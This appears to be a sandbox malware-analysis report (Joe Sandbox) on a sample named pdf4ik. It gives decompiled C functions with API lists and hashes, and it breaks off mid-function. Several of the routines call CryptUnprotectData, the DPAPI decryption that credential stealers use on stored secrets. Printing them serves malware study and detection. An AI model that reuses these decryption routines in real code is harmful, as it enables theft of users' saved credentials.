                                        0x29d8ad3c
                                        0x00000000
                                        0x29d8ac24
                                        0x29d8abc9
                                        0x00000000
                                        0x00000000
                                        0x29d8ade7
                                        0x29d8ade7
                                        0x29d8adea
                                        0x29d8aded
                                        0x29d8adf0
                                        0x29d8adf3
                                        0x29d8adf8
                                        0x29d8adfa
                                        0x29d8adfd
                                        0x29d8ae00
                                        0x29d8ae03
                                        0x29d8ae05
                                        0x29d8ae08
                                        0x29d8ae0c
                                        0x29d8ae0e
                                        0x29d8ae10
                                        0x29d8ae18
                                        0x29d8ae1b
                                        0x00000000
                                        0x29d8ae21
                                        0x29d8ae21
                                        0x29d8ae24
                                        0x29d8ae27
                                        0x29d8ae2a
                                        0x29d8ae2b
                                        0x29d8ae2c
                                        0x29d8ae35
                                        0x29d8ae38
                                        0x29d8ae3b
                                        0x29d8ae3d
                                        0x29d8ae40
                                        0x29d8ae43
                                        0x29d8ae46
                                        0x29d8ae49
                                        0x29d8ae4c
                                        0x29d8ae4f
                                        0x29d8ae52
                                        0x29d8ae55
                                        0x29d8ae57
                                        0x29d8ae5e
                                        0x29d8ae61
                                        0x29d8ae61
                                        0x29d8ae59
                                        0x29d8ae59
                                        0x29d8ae5b
                                        0x29d8ae5b
                                        0x29d8ae63
                                        0x29d8ae67
                                        0x29d8ae6a
                                        0x29d8b0a4
                                        0x00000000
                                        0x29d8ae70
                                        0x29d8ae70
                                        0x00000000
                                        0x29d8ae70
                                        0x29d8ae6a
                                        0x00000000
                                        0x00000000
                                        0x29d8b0aa
                                        0x29d8b0aa
                                        0x29d8b0ad
                                        0x29d8b0b1
                                        0x29d8b0b4
                                        0x29d8b0b9
                                        0x29d8b0bf
                                        0x29d8b0c2
                                        0x29d8b0c5
                                        0x29d8b0f8
                                        0x00000000
                                        0x29d8b0c7
                                        0x29d8b0c7
                                        0x29d8b0ca
                                        0x29d8b0cd
                                        0x29d8b0d0
                                        0x29d8b0d3
                                        0x29d8b0d6
                                        0x29d8b0d9
                                        0x29d8b0db
                                        0x29d8b0dd
                                        0x29d8b0df
                                        0x29d8b0e2
                                        0x29d8b0e2
                                        0x29d8b0e2
                                        0x29d8b0e5
                                        0x29d8b0e8
                                        0x29d8b0e9
                                        0x29d8b0f1
                                        0x29d8b0f2
                                        0x29d8b0f7
                                        0x29d8b0f7
                                        0x00000000
                                        0x00000000
                                        0x29d8b0fe
                                        0x29d8b0fe
                                        0x29d8b101
                                        0x29d8b104
                                        0x29d8b107
                                        0x29d8b10a
                                        0x29d8b10d
                                        0x00000000
                                        0x00000000
                                        0x29d8af99
                                        0x29d8af99
                                        0x29d8af9c
                                        0x29d8af9f

                                        Strings
                                        • invalid bit length repeat, xrefs: 29D8B024
                                        • invalid stored block lengths, xrefs: 29D8AF12
                                        • too many length or distance symbols, xrefs: 29D8AF92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: invalid bit length repeat$invalid stored block lengths$too many length or distance symbols
                                        • API String ID: 0-949635641
                                        • Opcode ID: ecfc5c5cded07abe5b3ba23e6cad47ab0144c18fd300b126a80c76ebc2894c39
                                        • Instruction ID: ae108b0f6f6cc4a7a2fd985e43bb87c8d83168e8240b224f5a618fce08ea9cb2
                                        • Opcode Fuzzy Hash: ecfc5c5cded07abe5b3ba23e6cad47ab0144c18fd300b126a80c76ebc2894c39
                                        • Instruction Fuzzy Hash: F16220B5A00605DFCB18CF69C590AAEBBF1FF88310F10856ED45A97B46E734AA42DF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E29D8C0E0(signed char** __eax, void* __ecx) {
                                        				signed char _v8;
                                        				signed int* _t121;
                                        				signed int _t122;
                                        				unsigned int _t159;
                                        				signed char** _t187;
                                        
                                        				_t187 = __eax;
                                        				if(__eax == 0) {
                                        					L34:
                                        					return 0xfffffffe;
                                        				} else {
                                        					_t121 =  *(__eax + 0x1c);
                                        					if(_t121 != 0 &&  *((intOrPtr*)(__eax)) != 0) {
                                        						_t122 =  *_t121;
                                        						_t159 = 0xfffffffb;
                                        						while(_t122 <= 0xd) {
                                        							switch( *((intOrPtr*)(_t122 * 4 +  &M29D8C448))) {
                                        								case 0:
                                        									_t123 = _t187[1];
                                        									if(_t123 == 0) {
                                        										goto L36;
                                        									} else {
                                        										_t187[2] =  &(_t187[2][1]);
                                        										_t187[1] = _t123 - 1;
                                        										_t127 =  *( *_t187) & 0x000000ff;
                                        										_t187[7][4] = _t127;
                                        										 *_t187 =  &(( *_t187)[1]);
                                        										_t159 = 0;
                                        										if((_t127 & 0x0000000f) == 8) {
                                        											_t129 = _t187[7];
                                        											if((_t129[4] >> 4) + 8 <= _t129[0x10]) {
                                        												 *_t129 = 1;
                                        												goto L11;
                                        											} else {
                                        												 *_t129 = 0xd;
                                        												_t187[6] = "invalid window size";
                                        												goto L32;
                                        											}
                                        										} else {
                                        											 *(_t187[7]) = 0xd;
                                        											_t187[6] = "unknown compression method";
                                        											_t187[7][4] = 5;
                                        											goto L33;
                                        										}
                                        									}
                                        									goto L50;
                                        								case 1:
                                        									L11:
                                        									_t130 = _t187[1];
                                        									if(_t130 == 0) {
                                        										goto L36;
                                        									} else {
                                        										_t187[2] =  &(_t187[2][1]);
                                        										_t194 = _t187[7];
                                        										_t187[1] = _t130 - 1;
                                        										_t132 =  *_t187;
                                        										_t167 =  *_t132 & 0x000000ff;
                                        										 *_t187 =  &(_t132[1]);
                                        										_v8 = _t167;
                                        										_t159 = 0;
                                        										if(((_t194[4] << 8) + _t167) % 0x1f == 0) {
                                        											if((_v8 & 0x00000020) != 0) {
                                        												 *(_t187[7]) = 2;
                                        												goto L38;
                                        											} else {
                                        												 *_t194 = 7;
                                        												goto L33;
                                        											}
                                        										} else {
                                        											 *_t194 = 0xd;
                                        											_t187[6] = "incorrect header check";
                                        											goto L32;
                                        										}
                                        									}
                                        									goto L50;
                                        								case 2:
                                        									L38:
                                        									_t138 = _t187[1];
                                        									if(_t138 == 0) {
                                        										goto L36;
                                        									} else {
                                        										_t187[2] =  &(_t187[2][1]);
                                        										_t187[1] = _t138 - 1;
                                        										_t187[7][8] = ( *( *_t187) & 0x000000ff) << 0x18;
                                        										_t159 = 0;
                                        										 *_t187 =  &(( *_t187)[1]);
                                        										 *(_t187[7]) = 3;
                                        										goto L40;
                                        									}
                                        									goto L50;
                                        								case 3:
                                        									L40:
                                        									_t142 = _t187[1];
                                        									if(_t142 == 0) {
                                        										goto L36;
                                        									} else {
                                        										_t187[2] =  &(_t187[2][1]);
                                        										_t187[1] = _t142 - 1;
                                        										_t187[7][8] = _t187[7][8] + (( *( *_t187) & 0x000000ff) << 0x10);
                                        										_t159 = 0;
                                        										 *_t187 =  &(( *_t187)[1]);
                                        										 *(_t187[7]) = 4;
                                        										goto L42;
                                        									}
                                        									goto L50;
                                        								case 4:
                                        									L42:
                                        									_t146 = _t187[1];
                                        									if(_t146 == 0) {
                                        										goto L36;
                                        									} else {
                                        										_t187[2] =  &(_t187[2][1]);
                                        										_t187[1] = _t146 - 1;
                                        										_t187[7][8] = _t187[7][8] + (( *( *_t187) & 0x000000ff) << 8);
                                        										_t159 = 0;
                                        										 *_t187 =  &(( *_t187)[1]);
                                        										 *(_t187[7]) = 5;
                                        										goto L44;
                                        									}
                                        									goto L50;
                                        								case 5:
                                        									L44:
                                        									_t150 = _t187[1];
                                        									if(_t150 == 0) {
                                        										goto L36;
                                        									} else {
                                        										_t187[2] =  &(_t187[2][1]);
                                        										_t187[1] = _t150 - 1;
                                        										_t187[7][8] = _t187[7][8] + ( *( *_t187) & 0x000000ff);
                                        										_t153 = _t187[7];
                                        										 *_t187 =  &(( *_t187)[1]);
                                        										_t187[0xc] = _t153[8];
                                        										 *_t153 = 6;
                                        										return 2;
                                        									}
                                        									goto L50;
                                        								case 6:
                                        									 *(__edi[7]) = 0xd;
                                        									__eax = __edi[7];
                                        									__edi[6] = "need dictionary";
                                        									 *((intOrPtr*)(__edi[7] + 4)) = 0;
                                        									__eax = 0xfffffffe;
                                        									_pop(__edi);
                                        									_pop(__esi);
                                        									_pop(__ebx);
                                        									return 0xfffffffe;
                                        									goto L50;
                                        								case 7:
                                        									__ecx = __edi[7];
                                        									__ecx =  *(__edi[7] + 0x14);
                                        									__eax = __edi;
                                        									__ebx = E29D8A7A0(__edi,  *(__edi[7] + 0x14), __ebx);
                                        									if(__ebx != 0xfffffffd) {
                                        										if(__ebx == 0) {
                                        											__ebx = 0;
                                        											goto L36;
                                        										} else {
                                        											if(__ebx != 1) {
                                        												goto L36;
                                        											} else {
                                        												__ecx = __edi[7];
                                        												__esi =  *((intOrPtr*)(__ecx + 0x14));
                                        												__eax = __ecx + 4;
                                        												__ebx = 0;
                                        												__eax = E29D8A690(__ecx + 4, __edi,  *((intOrPtr*)(__ecx + 0x14)));
                                        												__eax = __edi[7];
                                        												if( *((intOrPtr*)(__eax + 0xc)) == 0) {
                                        													 *__eax = 8;
                                        													goto L23;
                                        												} else {
                                        													 *__eax = 0xc;
                                        													goto L33;
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										 *(__edi[7]) = 0xd;
                                        										__eax = __edi[7];
                                        										 *((intOrPtr*)(__edi[7] + 4)) = 0;
                                        										goto L33;
                                        									}
                                        									goto L50;
                                        								case 8:
                                        									L23:
                                        									__eax = __edi[1];
                                        									if(__eax == 0) {
                                        										goto L36;
                                        									} else {
                                        										__ecx =  *__edi;
                                        										__edi[2] = __edi[2] + 1;
                                        										__edi[1] = __eax;
                                        										__eax = __edi[7];
                                        										 *(__edi[7] + 8) = ( *( *__edi) & 0x000000ff) << 0x18;
                                        										__ecx = __edi[7];
                                        										__ebx = 0;
                                        										 *__edi =  *__edi + 1;
                                        										 *(__edi[7]) = 9;
                                        										goto L25;
                                        									}
                                        									goto L50;
                                        								case 9:
                                        									L25:
                                        									__eax = __edi[1];
                                        									if(__eax == 0) {
                                        										goto L36;
                                        									} else {
                                        										__edi[2] = __edi[2] + 1;
                                        										__edi[1] = __eax;
                                        										__ecx =  *( *__edi) & 0x000000ff;
                                        										__eax = __edi[7];
                                        										__ecx = ( *( *__edi) & 0x000000ff) << 0x10;
                                        										 *(__edi[7] + 8) =  *(__edi[7] + 8) + (( *( *__edi) & 0x000000ff) << 0x10);
                                        										__ebx = 0;
                                        										 *__edi =  *__edi + 1;
                                        										 *(__edi[7]) = 0xa;
                                        										goto L27;
                                        									}
                                        									goto L50;
                                        								case 0xa:
                                        									L27:
                                        									__eax = __edi[1];
                                        									if(__eax == 0) {
                                        										goto L36;
                                        									} else {
                                        										__ecx =  *__edi;
                                        										__edi[2] = __edi[2] + 1;
                                        										__edi[1] = __eax;
                                        										__eax = __edi[7];
                                        										 *(__edi[7] + 8) =  *(__edi[7] + 8) + (( *( *__edi) & 0x000000ff) << 8);
                                        										__eax = __edi[7];
                                        										__ebx = 0;
                                        										 *__edi =  *__edi + 1;
                                        										 *(__edi[7]) = 0xb;
                                        										goto L29;
                                        									}
                                        									goto L50;
                                        								case 0xb:
                                        									L29:
                                        									__eax = __edi[1];
                                        									if(__eax == 0) {
                                        										L36:
                                        										return _t159;
                                        									} else {
                                        										__ecx =  *__edi;
                                        										__edi[2] = __edi[2] + 1;
                                        										__edi[1] = __eax;
                                        										__eax = __edi[7];
                                        										 *(__edi[7] + 8) =  *(__edi[7] + 8) + ( *( *__edi) & 0x000000ff);
                                        										__eax = __edi[7];
                                        										 *__edi =  *__edi + 1;
                                        										__ecx =  *(__eax + 4);
                                        										__ebx = 0;
                                        										if( *(__eax + 4) ==  *((intOrPtr*)(__eax + 8))) {
                                        											__ecx = __edi[7];
                                        											 *(__edi[7]) = 0xc;
                                        											goto L48;
                                        										} else {
                                        											 *__eax = 0xd;
                                        											__edi[6] = "incorrect data check";
                                        											L32:
                                        											_t187[7][1] = 5;
                                        											goto L33;
                                        										}
                                        									}
                                        									goto L50;
                                        								case 0xc:
                                        									L48:
                                        									__eax = 1;
                                        									_pop(__edi);
                                        									_pop(__esi);
                                        									_pop(__ebx);
                                        									return 1;
                                        									goto L50;
                                        								case 0xd:
                                        									_pop(__edi);
                                        									_pop(__esi);
                                        									__eax = 0xfffffffd;
                                        									_pop(__ebx);
                                        									return 0xfffffffd;
                                        									goto L50;
                                        							}
                                        							L33:
                                        							_t122 =  *(_t187[7]);
                                        						}
                                        					}
                                        					goto L34;
                                        				}
                                        				L50:
                                        			}








                                        0x29d8c2ad
                                        0x29d8c2ad
                                        0x29d8c2b2
                                        0x00000000
                                        0x29d8c2b8
                                        0x29d8c2b8
                                        0x29d8c2ba
                                        0x29d8c2be
                                        0x29d8c2c4
                                        0x29d8c2ca
                                        0x29d8c2cd
                                        0x29d8c2d0
                                        0x29d8c2d2
                                        0x29d8c2d4
                                        0x00000000
                                        0x29d8c2d4
                                        0x00000000
                                        0x00000000
                                        0x29d8c2da
                                        0x29d8c2da
                                        0x29d8c2df
                                        0x29d8c339
                                        0x29d8c341
                                        0x29d8c2e1
                                        0x29d8c2e1
                                        0x29d8c2e3
                                        0x29d8c2e7
                                        0x29d8c2ed
                                        0x29d8c2f0
                                        0x29d8c2f3
                                        0x29d8c2f6
                                        0x29d8c2f8
                                        0x29d8c2fb
                                        0x29d8c300
                                        0x29d8c426
                                        0x29d8c429
                                        0x00000000
                                        0x29d8c306
                                        0x29d8c306
                                        0x29d8c30c
                                        0x29d8c313
                                        0x29d8c316
                                        0x00000000
                                        0x29d8c316
                                        0x29d8c300
                                        0x00000000
                                        0x00000000
                                        0x29d8c42f
                                        0x29d8c42f
                                        0x29d8c434
                                        0x29d8c435
                                        0x29d8c436
                                        0x29d8c43a
                                        0x00000000
                                        0x00000000
                                        0x29d8c43b
                                        0x29d8c43c
                                        0x29d8c43d
                                        0x29d8c442
                                        0x29d8c446
                                        0x00000000
                                        0x00000000
                                        0x29d8c31d
                                        0x29d8c320
                                        0x29d8c322
                                        0x29d8c10f
                                        0x00000000
                                        0x29d8c0f6
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
                                        • API String ID: 0-563650611
                                        • Opcode ID: 5aca2d39171294c868533136438a88bb240eb84b9a0f60d2e09f2fbff0f11a72
                                        • Instruction ID: a3cbef64e97a2503c9a0c664cf61cd99561400c9f6d073e2d1cc170a39e0653e
                                        • Opcode Fuzzy Hash: 5aca2d39171294c868533136438a88bb240eb84b9a0f60d2e09f2fbff0f11a72
                                        • Instruction Fuzzy Hash: 45B114B4605A06EFD704CF69D480A21F7F4FF4A311B10866AD9198BB92D735E8A3DF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E29DADF46(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                        				intOrPtr _v0;
                                        				void* _v804;
                                        				intOrPtr _v808;
                                        				intOrPtr _v812;
                                        				intOrPtr _t6;
                                        				intOrPtr _t11;
                                        				intOrPtr _t12;
                                        				intOrPtr _t13;
                                        				long _t17;
                                        				intOrPtr _t21;
                                        				intOrPtr _t22;
                                        				intOrPtr _t25;
                                        				intOrPtr _t26;
                                        				intOrPtr _t27;
                                        				intOrPtr* _t31;
                                        				void* _t34;
                                        
                                        				_t27 = __esi;
                                        				_t26 = __edi;
                                        				_t25 = __edx;
                                        				_t22 = __ecx;
                                        				_t21 = __ebx;
                                        				_t6 = __eax;
                                        				_t34 = _t22 -  *0x29dd5664; // 0xd9555f04
                                        				if(_t34 == 0) {
                                        					asm("repe ret");
                                        				}
                                        				 *0x29dd6e08 = _t6;
                                        				 *0x29dd6e04 = _t22;
                                        				 *0x29dd6e00 = _t25;
                                        				 *0x29dd6dfc = _t21;
                                        				 *0x29dd6df8 = _t27;
                                        				 *0x29dd6df4 = _t26;
                                        				 *0x29dd6e20 = ss;
                                        				 *0x29dd6e14 = cs;
                                        				 *0x29dd6df0 = ds;
                                        				 *0x29dd6dec = es;
                                        				 *0x29dd6de8 = fs;
                                        				 *0x29dd6de4 = gs;
                                        				asm("pushfd");
                                        				_pop( *0x29dd6e18);
                                        				 *0x29dd6e0c =  *_t31;
                                        				 *0x29dd6e10 = _v0;
                                        				 *0x29dd6e1c =  &_a4;
                                        				 *0x29dd6d58 = 0x10001;
                                        				_t11 =  *0x29dd6e10; // 0x0
                                        				 *0x29dd6d0c = _t11;
                                        				 *0x29dd6d00 = 0xc0000409;
                                        				 *0x29dd6d04 = 1;
                                        				_t12 =  *0x29dd5664; // 0xd9555f04
                                        				_v812 = _t12;
                                        				_t13 =  *0x29dd5668; // 0x26aaa0fb
                                        				_v808 = _t13;
                                        				 *0x29dd6d50 = IsDebuggerPresent();
                                        				_push(1);
                                        				E29DBBF15(_t14);
                                        				SetUnhandledExceptionFilter(0);
                                        				_t17 = UnhandledExceptionFilter(0x29dc62b8);
                                        				if( *0x29dd6d50 == 0) {
                                        					_push(1);
                                        					E29DBBF15(_t17);
                                        				}
                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                        			}




















                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 29DB2F5A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 29DB2F6F
                                        • UnhandledExceptionFilter.KERNEL32(29DC62B8), ref: 29DB2F7A
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 29DB2F96
                                        • TerminateProcess.KERNEL32(00000000), ref: 29DB2F9D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: 360fa6de99e0221a86b5d4e2fc70bde471c3c4713d6459d7fb6b7ef713f800b8
                                        • Instruction ID: ab7da9ab5e39480e72de1bc4d26b97942ffb7a575a056bc16b9ec6666d3c71ec
                                        • Opcode Fuzzy Hash: 360fa6de99e0221a86b5d4e2fc70bde471c3c4713d6459d7fb6b7ef713f800b8
                                        • Instruction Fuzzy Hash: A621CABA804280DFC700FF68F584A453BB4BB48300F90C02AE50A8B641E7BD9985BFE5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 31%
                                        			E29D994A0(char __eax, intOrPtr __ecx, void* __eflags) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				intOrPtr _v16;
                                        				char _v20;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t19;
                                        				intOrPtr _t21;
                                        				intOrPtr _t22;
                                        				char _t23;
                                        				void* _t24;
                                        
                                        				_t23 = __eax;
                                        				_t21 = __ecx;
                                        				E29DB0010(E29DADFE0(_t19, __ecx, __eax, __eax), _t21, _t23);
                                        				_v8 = _t21;
                                        				_v12 = _t23;
                                        				_t24 = E29DADFE0(_t19, _t21, _t23, _t23);
                                        				_push( &_v20);
                                        				_push(0);
                                        				_push(0);
                                        				_push(0);
                                        				_push(0);
                                        				_push(0);
                                        				_push( &_v12);
                                        				if( *0x29dd8428() == 0) {
                                        					return 0;
                                        				} else {
                                        					_t22 = _v20;
                                        					if(_t22 != 0) {
                                        						E29DB0010(_t24, _v16, _t22);
                                        					}
                                        					 *((char*)(_t22 + _t24)) = 0;
                                        					return _t24;
                                        				}
                                        			}















                                        APIs
                                        • _malloc.LIBCMT ref: 29D994AD
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • _memmove.LIBCMT ref: 29D994B5
                                        • _malloc.LIBCMT ref: 29D994C1
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,29D99635), ref: 29D994DD
                                        • _memmove.LIBCMT ref: 29D994F4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
                                        • String ID:
                                        • API String ID: 2315474888-0
                                        • Opcode ID: f1adca8047aca54ec38fc3b723a8b64b53796ef1c321ed88ae0adfe6f9c37206
                                        • Instruction ID: 00abdb3b1c82a178fc828bb962f1fb9e1e72100217d217ad901c63aa0bd61236
                                        • Opcode Fuzzy Hash: f1adca8047aca54ec38fc3b723a8b64b53796ef1c321ed88ae0adfe6f9c37206
                                        • Instruction Fuzzy Hash: DAF0F432A111187BD710AAA99C01FEFBBACDF91520F0445AEF904D3204EA72D91293F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 20%
                                        			E29D85010(intOrPtr _a4, intOrPtr _a8) {
                                        				short* _v8;
                                        				int _v12;
                                        				intOrPtr _v16;
                                        				char _v20;
                                        				char* _t11;
                                        				char* _t26;
                                        
                                        				_t11 = HeapAlloc(GetProcessHeap(), 8, 0x400);
                                        				_push( &_v12);
                                        				_push(1);
                                        				_push(0);
                                        				_t26 = _t11;
                                        				_push(0);
                                        				_push(0);
                                        				_v16 = _a4 + 1;
                                        				_push(0);
                                        				_push( &_v20);
                                        				_v20 = _a8 - 1;
                                        				if( *0x29dd8428() == 0) {
                                        					return 0x29dcd617;
                                        				} else {
                                        					WideCharToMultiByte(0, 0, _v8, _v12, _t26, 0x400, 0, 0);
                                        					LocalFree(_v8);
                                        					return _t26;
                                        				}
                                        			}










                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 29D8501E
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D85025
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 29D8504D
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 29D8506D
                                        • LocalFree.KERNEL32(?), ref: 29D85077
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 3657800372-0
                                        • Opcode ID: 53c5286a6e5a010b4e53199736553d5c90be3116de4218368090da555787d44c
                                        • Instruction ID: b43a7aa52538c1577157d17cbe99dbf0b873ba7d17100210107aee76e3b3a462
                                        • Opcode Fuzzy Hash: 53c5286a6e5a010b4e53199736553d5c90be3116de4218368090da555787d44c
                                        • Instruction Fuzzy Hash: 72017575B80308BFEB10EA94DC4AFAE7778EB44B14F008144FB05EB2C0D6B5A9009BE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 55%
                                        			E29DA3900(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, signed int __fp0) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				struct _SYSTEMTIME _v36;
                                        				short _v38;
                                        				short _v42;
                                        				short _v46;
                                        				short _v50;
                                        				char _v52;
                                        				intOrPtr _v60;
                                        				char _v80;
                                        				struct _TIME_ZONE_INFORMATION _v260;
                                        				signed long long _v264;
                                        				signed int _t28;
                                        				signed int _t29;
                                        				void* _t36;
                                        				intOrPtr _t42;
                                        				intOrPtr _t54;
                                        				signed int _t55;
                                        				void* _t56;
                                        
                                        				_t54 = __esi;
                                        				_t53 = __edi;
                                        				_t42 = __ebx;
                                        				_t28 =  *0x29dd5664; // 0xd9555f04
                                        				_t29 = _t28 ^ _t55;
                                        				_v20 = _t29;
                                        				 *[fs:0x0] =  &_v16;
                                        				_v264 = 0;
                                        				_v36.wYear = 0;
                                        				_v36.wMonth = 0;
                                        				_v36.wDay = 0;
                                        				_v36.wMinute = 0;
                                        				_v36.wMilliseconds = 0;
                                        				GetSystemTime( &_v36);
                                        				GetTimeZoneInformation( &_v260);
                                        				_t52 =  &_v36;
                                        				_v52 = 0;
                                        				_v50 = 0;
                                        				_v46 = 0;
                                        				_v42 = 0;
                                        				_v38 = 0;
                                        				 *0x29dd85d0( &_v260,  &_v36,  &_v52, _t29,  *[fs:0x0], E29DC2EA8, 0xffffffff);
                                        				asm("fild dword [ebp-0x100]");
                                        				asm("fchs");
                                        				_v264 = __fp0 /  *0x29dd0b48;
                                        				 *((intOrPtr*)(_t56 - 0xf8)) = _v264;
                                        				_t36 = E29DA4A40(__edi,  &_v80,  &_v52);
                                        				_v8 = 0;
                                        				E29D89930("UTC", __esi, _t36);
                                        				if(_v60 >= 0x10) {
                                        					_t52 = _v80;
                                        					_push(_v80);
                                        					E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				return E29DADF46(_t54, _t42, _v20 ^ _t55, _t52, _t53, _t54);
                                        			}
























                                        APIs
                                        • GetSystemTime.KERNEL32 ref: 29DA394C
                                        • GetTimeZoneInformation.KERNEL32(?), ref: 29DA3959
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 29DA3981
                                          • Part of subcall function 29DA4A40: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 29DA4B01
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$InformationIos_base_dtorLocalSpecificZonestd::ios_base::_
                                        • String ID: UTC
                                        • API String ID: 2730280976-2754919731
                                        • Opcode ID: 2702d7f3aa886d315f984de08c9904e007333d5698fa4b0565c6024b279f8929
                                        • Instruction ID: f81519987f05dfeef689104cbbd21932b31aaf9b83b11330db3157a21351a4f2
                                        • Opcode Fuzzy Hash: 2702d7f3aa886d315f984de08c9904e007333d5698fa4b0565c6024b279f8929
                                        • Instruction Fuzzy Hash: CD214BB6D14248DBCB00DFA4D984BEEBBB8FF58700F00456EE41AE3640EB345654DB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E29D99210(intOrPtr __eax, intOrPtr __ecx, long* __edi, void** _a4) {
                                        				void* _v12;
                                        				long _v16;
                                        				intOrPtr _v20;
                                        				char _v24;
                                        				long _t16;
                                        				void* _t17;
                                        				void* _t26;
                                        
                                        				_v20 = __eax;
                                        				_v24 = __ecx;
                                        				_t26 =  *0x29dd8428( &_v24, 0, 0, 0, 0, 0,  &_v16);
                                        				if(_t26 != 0) {
                                        					_t16 = _v16;
                                        					 *__edi = _t16;
                                        					_t17 = LocalAlloc(0x40, _t16);
                                        					 *_a4 = _t17;
                                        					if(_t17 != 0) {
                                        						E29DB0010(_t17, _v12,  *__edi);
                                        					}
                                        				}
                                        				return LocalFree(_v12) & 0xffffff00 | _t26 != 0x00000000;
                                        			}











                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,29DCFF18), ref: 29D9922F
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 29D99243
                                        • _memmove.LIBCMT ref: 29D9925A
                                        • LocalFree.KERNEL32(?), ref: 29D99266
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect_memmove
                                        • String ID:
                                        • API String ID: 3008826695-0
                                        • Opcode ID: 557c432c0fcfc3eecb6347cd2861065f0312b3609b966174a717f18df1936106
                                        • Instruction ID: e7314096d0c802f2fae0092c97f6297038fbba853a235ccbbe25bd35e12001e6
                                        • Opcode Fuzzy Hash: 557c432c0fcfc3eecb6347cd2861065f0312b3609b966174a717f18df1936106
                                        • Instruction Fuzzy Hash: 4B016DB6E41319ABE700ABA4DC46FAE777CEF44B00F108158EE00AB284D774DA009BE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D991B0(DWORD* __eax, char* __ebx, void** __edi) {
                                        				BYTE* _t5;
                                        				int _t6;
                                        				DWORD* _t12;
                                        				int _t13;
                                        
                                        				_t12 = __eax;
                                        				 *__edi = 0;
                                        				 *__eax = 0;
